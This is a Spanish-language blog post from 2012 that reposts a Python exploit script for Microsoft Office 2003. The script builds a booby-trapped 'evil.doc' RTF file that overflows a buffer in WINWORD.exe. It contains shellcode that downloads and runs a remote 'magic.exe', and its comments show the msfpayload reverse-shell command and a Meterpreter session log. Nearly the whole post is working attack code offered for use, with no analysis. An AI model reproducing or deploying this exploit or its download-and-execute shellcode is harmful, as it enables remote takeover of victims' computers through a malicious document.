lunes, 9 de enero de 2012

Microsoft Office 2003 Home/Pro 0day

#!/usr/bin/python

#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#

#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on 192.168.111.132:9988 #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to 192.168.111.128 #
# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : 127.0.0.1 #
# Netmask : 255.0.0.0 #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : 192.168.111.128 #
# Netmask : 255.255.255.0 #
#-----------------------------------------------------------------------------------#

import binascii

filename = "evil.doc"

#-----------------------------------------------------------------------------------#
# File Structure #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")

#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")

#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#

EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer

filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18

buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic

#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#

URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)

URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"

textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()
By Unknown en lunes, enero 09, 2012
Etiquetas: ,

No hay comentarios.:

Publicar un comentario

Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?

Suscribirse a: Comentarios de la entrada (Atom)

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)